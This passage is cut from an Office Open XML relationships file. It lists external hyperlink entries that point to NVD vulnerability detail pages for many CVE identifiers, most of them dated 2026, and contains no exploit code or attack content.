Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57967" TargetMode="External" Id="rId62" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58240" TargetMode="External" Id="rId63" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62916" TargetMode="External" Id="rId64" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67919" TargetMode="External" Id="rId65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68839" TargetMode="External" Id="rId66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69240" TargetMode="External" Id="rId67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69276" TargetMode="External" Id="rId68" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69408" TargetMode="External" Id="rId69" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69463" TargetMode="External" Id="rId70" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69491" TargetMode="External" Id="rId71" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69493" TargetMode="External" Id="rId72" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69496" TargetMode="External" Id="rId73" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69525" TargetMode="External" Id="rId74" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69579" TargetMode="External" Id="rId75" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69586" TargetMode="External" Id="rId76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69590" TargetMode="External" Id="rId77" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69595" TargetMode="External" Id="rId78" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69715" TargetMode="External" Id="rId79" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69730" TargetMode="External" Id="rId80" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69768" TargetMode="External" Id="rId81" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69769" TargetMode="External" Id="rId82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69824" TargetMode="External" Id="rId83" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69829" TargetMode="External" Id="rId84" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69845" TargetMode="External" Id="rId85" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69910" TargetMode="External" Id="rId86" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70296" TargetMode="External" Id="rId87" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72979" TargetMode="External" Id="rId88" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72982" TargetMode="External" Id="rId89" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72983" TargetMode="External" Id="rId90" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73009" TargetMode="External" Id="rId91" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73010" TargetMode="External" Id="rId92" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73025" TargetMode="External" Id="rId93" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76904" TargetMode="External" Id="rId94" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77493" TargetMode="External" Id="rId95" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78445" TargetMode="External" Id="rId96" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78509" TargetMode="External" Id="rId97" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78510" TargetMode="External" Id="rId98" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78573" TargetMode="External" Id="rId99" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79724" TargetMode="External" Id="rId100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80351" TargetMode="External" Id="rId101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80352" TargetMode="External" Id="rId102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81204" TargetMode="External" Id="rId103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84372" TargetMode="External" Id="rId104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85025" TargetMode="External" Id="rId105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19274" TargetMode="External" Id="rId106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47705" TargetMode="External" Id="rId107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53649" TargetMode="External" Id="rId108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54694" TargetMode="External" Id="rId109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54725" TargetMode="External" Id="rId110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72877" TargetMode="External" Id="rId111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73300" TargetMode="External" Id="rId112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73843" TargetMode="External" Id="rId113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82100" TargetMode="External" Id="rId114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82107" TargetMode="External" Id="rId115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87494" TargetMode="External" Id="rId116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87512" TargetMode="External" Id="rId117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87528" TargetMode="External" Id="rId118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87621" TargetMode="External" Id="rId119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87654" TargetMode="External" Id="rId120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70470" TargetMode="External" Id="rId121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70477" TargetMode="External" Id="rId122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-41242" TargetMode="External" Id="rId123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-43114" TargetMode="External" Id="rId124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45272" TargetMode="External" Id="rId125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67305" TargetMode="External" Id="rId126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69254" TargetMode="External" Id="rId127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69256" TargetMode="External" Id="rId128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69259" TargetMode="External" Id="rId129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69264" TargetMode="External" Id="rId130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72879" TargetMode="External" Id="rId131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76969" TargetMode="External" Id="rId132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-14813" TargetMode="External" Id="rId133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15378" TargetMode="External" Id="rId134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44990" TargetMode="External" Id="rId135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45118" TargetMode="External" Id="rId136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47754" TargetMode="External" Id="rId137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48063" TargetMode="External" Id="rId138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48158" TargetMode="External" Id="rId139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48159" TargetMode="External" Id="rId140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48160" TargetMode="External" Id="rId141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48996" TargetMode="External" Id="rId142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53578" TargetMode="External" Id="rId143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53579" TargetMode="External" Id="rId144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55068" TargetMode="External" Id="rId145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55378" TargetMode="External" Id="rId146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62681" TargetMode="External" Id="rId147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62682" TargetMode="External" Id="rId148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63106" TargetMode="External" Id="rId149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66794" TargetMode="External" Id="rId150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67308" TargetMode="External" Id="rId151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68582" TargetMode="External" Id="rId152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68770" TargetMode="External" Id="rId153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68771" TargetMode="External" Id="rId154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69356" TargetMode="External" Id="rId155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71864" TargetMode="External" Id="rId156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71865" TargetMode="External" Id="rId157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71866" TargetMode="External" Id="rId158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71867" TargetMode="External" Id="rId159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71868" TargetMode="External" Id="rId160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71869" TargetMode="External" Id="rId161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71871" TargetMode="External" Id="rId162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72716" TargetMode="External" Id="rId163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72717" TargetMode="External" Id="rId164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75854" TargetMode="External" Id="rId165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76200" TargetMode="External" Id="rId166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76201" TargetMode="External" Id="rId167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77776" TargetMode="External" Id="rId168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78997" TargetMode="External" Id="rId169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79782" TargetMode="External" Id="rId170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80238" TargetMode="External" Id="rId171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82526" TargetMode="External" Id="rId172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85391" TargetMode="External" Id="rId173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88867" TargetMode="External" Id="rId174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88869" TargetMode="External" Id="rId175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88877" TargetMode="External" Id="rId176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89253" TargetMode="External" Id="rId177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89255" TargetMode="External" Id="rId178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42945" TargetMode="External" Id="rId179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67402" TargetMode="External" Id="rId180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69255" TargetMode="External" Id="rId181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72836" TargetMode="External" Id="rId182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73414" TargetMode="External" Id="rId183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82067" TargetMode="External" Id="rId184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82090" TargetMode="External" Id="rId185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84197" TargetMode="External" Id="rId186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85625" TargetMode="External" Id="rId187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85694" TargetMode="External" Id="rId188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86426" TargetMode="External" Id="rId189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88880" TargetMode="External" Id="rId190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88887" TargetMode="External" Id="rId191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89243" TargetMode="External" Id="rId192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9277" TargetMode="External" Id="rId193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9317" TargetMode="External" Id="rId194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-10059" TargetMode="External" Id="rId195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16503" TargetMode="External" Id="rId196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17057" TargetMode="External" Id="rId197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17207" TargetMode="External" Id="rId198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19646" TargetMode="External" Id="rId199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27690" TargetMode="External" Id="rId200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27962" TargetMode="External" Id="rId201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-39832" TargetMode="External" Id="rId202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-41869" TargetMode="External" Id="rId203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42044" TargetMode="External" Id="rId204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48031" TargetMode="External" Id="rId205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49364" TargetMode="External" Id="rId206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53939" TargetMode="External" Id="rId207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55248" TargetMode="External" Id="rId208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55511" TargetMode="External" Id="rId209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58400" TargetMode="External" Id="rId210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67593" TargetMode="External" Id="rId211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69641" TargetMode="External" Id="rId212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73069" TargetMode="External" Id="rId213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75156" TargetMode="External" Id="rId214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75595" TargetMode="External" Id="rId215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79571" TargetMode="External" Id="rId216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80181" TargetMode="External" Id="rId217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80424" TargetMode="External" Id="rId218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84939" TargetMode="External" Id="rId219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86729" TargetMode="External" Id="rId220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87806" TargetMode="External" Id="rId221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-10090" TargetMode="External" Id="rId222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66768" TargetMode="External" Id="rId223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69251" TargetMode="External" Id="rId224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69253" TargetMode="External" Id="rId225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69854" TargetMode="External" Id="rId226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71851" TargetMode="External" Id="rId227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73842" TargetMode="External" Id="rId228" /><Relationship 